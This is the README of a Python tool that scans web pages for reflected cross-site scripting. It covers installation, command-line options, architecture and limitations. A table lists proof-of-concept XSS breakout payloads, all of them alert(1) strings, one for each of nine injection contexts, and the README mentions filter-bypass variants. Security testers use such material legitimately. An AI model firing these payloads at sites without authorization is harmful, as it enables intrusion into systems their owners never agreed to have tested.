A Python-based Reflected XSS (Cross-Site Scripting) vulnerability scanner with context-aware payload generation.
- Context-Aware Payload Generation: Dynamically generates payloads based on injection position
- 9 Injection Contexts: TEXT_NODE, ATTRIBUTE_VALUE, ATTRIBUTE_NAME, TAG_NAME, COMMENT, JS_STRING, JS_TEMPLATE, JS_CODE, URL_PARAMETER
- Auto Context Detection: Automatically analyzes responses to determine injection context
- GET & POST Support: Scan both GET parameters and POST form/JSON data
- Multiple Output Formats: Terminal (colored), HTML, and JSON reports
- Parallel Scanning: Thread-based and async I/O support for faster scans
- Filter Bypass Techniques: Includes payloads for common filter evasion
- Customizable: Headers, cookies, timeouts, and SSL options
- Python 3.8+
- pip
# Clone the repository
git clone <repository-url>
cd python-project
# Create a virtual environment (recommended)
python -m venv venv
# Activate virtual environment
# On Windows:
venv\Scripts\activate
# On Linux/Mac:
source venv/bin/activate
# Install dependencies
pip install -r requirements.txt# Scan a single parameter with GET request
python -m xss_scanner -u "http://example.com/search" -p query
# Scan multiple parameters
python -m xss_scanner -u "http://example.com/search" -p "query,filter,page"
# POST request
python -m xss_scanner -u "http://example.com/login" -p "username,password" -m POST# Specify injection contexts to test
python -m xss_scanner -u "http://example.com/page" -p input -c attribute_name,attribute_value,text_node
# Disable auto context detection
python -m xss_scanner -u "http://example.com/page" -p input --no-auto-detect
# Custom headers and cookies
python -m xss_scanner -u "http://example.com/api" -p q \
-H "Authorization: Bearer token123" \
-H "X-Custom-Header: value" \
--cookie "session=abc123; user=admin"
# POST with JSON body
python -m xss_scanner -u "http://example.com/api" -p data -m POST --json -d "key=value"
# Parallel scanning with 10 threads
python -m xss_scanner -u "http://example.com/search" -p query -t 10
# Async scanning (requires aiohttp)
python -m xss_scanner -u "http://example.com/search" -p query --async
# Generate HTML report
python -m xss_scanner -u "http://example.com/search" -p query -o report.html -f html
# JSON report
python -m xss_scanner -u "http://example.com/search" -p query -o report.json -f jsonUsage: python -m xss_scanner [OPTIONS]
Required:
-u, --url URL Target URL to scan
-p, --parameters PARAMS Comma-separated list of parameters to test
HTTP Options:
-m, --method METHOD HTTP method: GET or POST (default: GET)
-H, --header HEADER Custom header (can be used multiple times)
--cookie COOKIES Cookie string in "key=value; key2=value2" format
-d, --data DATA POST data in "key=value" format (can be repeated)
--json Send POST data as JSON
--timeout SECONDS Request timeout (default: 10)
--no-redirect Do not follow redirects
--insecure Skip SSL certificate verification
Scanning Options:
-c, --contexts CONTEXTS Comma-separated injection contexts to test
--no-auto-detect Disable automatic context detection
--no-bypass Disable filter bypass payloads
-t, --threads N Number of concurrent threads (default: 1)
--async Use async I/O for scanning
Output Options:
-o, --output FILE Output file path for the report
-f, --format FORMAT Report format: terminal, html, json
--no-color Disable colored terminal output
-q, --quiet Suppress progress output
-v, --verbose Enable verbose error output
xss_scanner/
├── __init__.py # Package initialization
├── __main__.py # Entry point for python -m
├── cli.py # Command-line interface
├── payload_generator.py # Context-aware payload generation
├── context_detector.py # Automatic context detection
├── scanner.py # Main scanning engine
└── report_generator.py # Report generation (HTML/terminal/JSON)
The PayloadGenerator class is the core of context-aware payload generation. It:
- Classifies injection contexts into 9 categories based on where user input appears in HTML/JS
- Generates targeted payloads for each context using breakout techniques appropriate to that position
- Includes filter bypass variants (case variation, whitespace tricks, separator manipulation)
How PayloadGenerator Chooses Payloads:
| Context | Strategy | Example Payload |
|---|---|---|
TEXT_NODE |
Inject complete HTML tags with event handlers | <img src=x onerror="alert(1)"> |
ATTRIBUTE_VALUE |
Break out of quotes, inject new attributes/tags | " onclick="alert(1)" x=" |
ATTRIBUTE_NAME |
Inject event handler as attribute | onmouseover=alert(1) |
TAG_NAME |
Create valid tags with handlers | img src=x onerror=alert(1) |
COMMENT |
Break out of comment | --><script>alert(1)</script><!-- |
JS_STRING |
Break string, inject code | ";alert(1);// |
JS_TEMPLATE |
Exploit template interpolation | ${alert(1)} |
JS_CODE |
Direct code injection | ;alert(1); |
URL_PARAMETER |
Use javascript: protocol | javascript:alert(1) |
Each payload includes:
- Value: The actual payload string
- Context: Which context it's designed for
- Description: Human-readable explanation
- Bypass Technique: (Optional) What filter bypass it uses
The ContextDetector analyzes HTTP responses to determine where input is reflected:
- Pattern Matching: Uses regex patterns to identify surrounding HTML/JS syntax
- Heuristic Analysis: Falls back to heuristics when patterns don't match
- Confidence Scoring: Each detection includes a confidence score (0.0-1.0)
Detection triggers payload generation for only the relevant contexts, reducing noise.
The main scanning engine:
- Context Probing: Sends probe values to detect reflection contexts
- Payload Selection: Gets appropriate payloads for detected contexts
- Request Execution: Sends payloads via GET/POST (sequential, threaded, or async)
- Reflection Detection: Uses substring matching to find reflected payloads
- Context Analysis: Analyzes the context of each reflection
Formats scan results into:
- Terminal: Colored ASCII output with statistics and findings
- HTML: Beautiful, responsive report with CSS styling
- JSON: Machine-readable format for integration
The scanner uses substring matching to detect reflections:
reflected = payload_value in response_bodyThis approach was chosen for:
- Simplicity: Easy to understand and debug
- Reliability: No false negatives from regex complexity
- Speed: Fast string search operations
For each reflection found, the scanner performs context analysis to:
- Determine where in the HTML/JS the reflection occurs
- Assess whether the reflection is exploitable
- Provide detailed context in the report
While more sophisticated approaches (DOM parsing, AST analysis) could provide better accuracy, substring matching offers:
- Lower complexity for the given scope
- Faster execution
- No dependencies on HTML parsers that may differ from browsers
- Easy to extend with additional checks
Rather than testing all payloads against all parameters, the scanner:
- Probes for context first
- Generates only relevant payloads
- Reduces scan time and false positives
Each component is independent and testable:
PayloadGeneratorcan be used standalone for payload generationContextDetectorcan analyze any HTML/JS contentReportGeneratorcan format any scan results
- Target Authorization: Users have authorization to scan the target
- HTTP/HTTPS Only: The scanner supports HTTP and HTTPS protocols
- Response Body: XSS reflections are detected in HTTP response bodies
- Single Request: Each payload is tested with one request (no multi-step exploitation)
- Browser Rendering: The scanner doesn't execute JavaScript; it detects reflection patterns
- No DOM-based XSS: Only detects reflected XSS, not DOM-based vulnerabilities
- No Stored XSS: Single-request model doesn't detect persistent XSS
- Simple Encoding Detection: Basic HTML entity detection, may miss complex encoding
- No WAF Detection: Doesn't specifically identify or bypass WAF solutions
- Type Hints: Full type annotations for IDE support and documentation
- Docstrings: All classes and methods documented
- Dataclasses: Clean data structures with
@dataclass - Enums: Type-safe context classification
- Error Handling: Graceful degradation on network errors
- Modular Design: Each component has single responsibility
Total development time: ~4 hours
- Architecture design: 30 minutes
- PayloadGenerator implementation: 45 minutes
- ContextDetector implementation: 30 minutes
- Scanner implementation: 60 minutes
- ReportGenerator implementation: 45 minutes
- CLI and integration: 30 minutes
- Documentation: 30 minutes
- Testing and refinement: 30 minutes
MIT License - See LICENSE file for details.
This tool is intended for authorized security testing only. Always obtain proper authorization before scanning any target. The authors are not responsible for misuse of this tool.